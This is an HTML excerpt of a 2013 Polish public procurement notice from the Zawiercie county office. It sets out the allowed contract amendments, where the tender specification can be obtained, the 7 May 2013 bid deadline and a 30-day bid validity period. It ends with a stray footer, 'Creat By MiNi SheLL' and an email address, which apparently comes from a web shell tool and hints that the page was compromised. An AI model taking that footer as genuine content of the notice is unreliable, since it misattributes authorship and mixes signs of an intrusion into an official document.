<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony mogą zmienić postanowienia zawartej umowy, w następujących przypadkach:
a) nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym zmiana stawki podatku VAT, 
b) konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, 
c) Termin realizacji może ulec wydłużeniu w wypadku zaistnienia przyczyn niewynikających z winy lub zaniedbań projektanta, tj. wydłużenie terminu uzgodnień dokumentacji, ekspertyz  i decyzji wydawanych przy tych uzgodnieniach. Dokonane w ten sposób wydłużenie wymaga sporządzenia aneksu do umowy.
d) Cena podana w ofercie za pełnienie nadzoru autorskiego może podlegać waloryzacji  o wskaźnik inflacji podawany przez prezesa GUS dla tego typu usług, jeśli  termin rozpoczęcia nadzoru  autorskiego będzie dłuższy niż dwa lata od podpisania umowy - z tym żę cena za pełnienie nadzoru autorskiego może podlegać waloryzacji jeden raz 
e)   przekształcenia podmiotowego Wykonawcy, 
f) zmiany członków personelu kluczowego Wykonawcy, w przypadku wystąpienia nieprzewidzianych okoliczności takich jak: śmierć osoby, rezygnacja/ odejście z pracy lub innych uniemożliwiających należyte wykonywanie obowiązków zgodnie z umową lub obowiązującym prawem. W takim jednak przypadku każda nowa osoba musi spełniać warunki określone przez Zamawiającego w ogłoszeniu o zamówieniu. 
g)  wstrzymania wykonania robót na żądanie Zamawiającego lub na podstawie poleceń lub decyzji uprawnionych osób lub organów administracji państwowej, samorządowej lub wystąpienia przyczyn niezależnych od Wykonawcy i Zamawiającego;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zawiercie.powiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Zawierciu
Samodzielny Referat Zamówień Publicznych
ul. Sienkiewicza 34,42-400 Zawiercie
III piętro, pokój 309.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Zawierciu
Samodzielny Referat Zamówień Publicznych
ul. Sienkiewicza 34,42-400 Zawiercie
III piętro, pokój 309.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com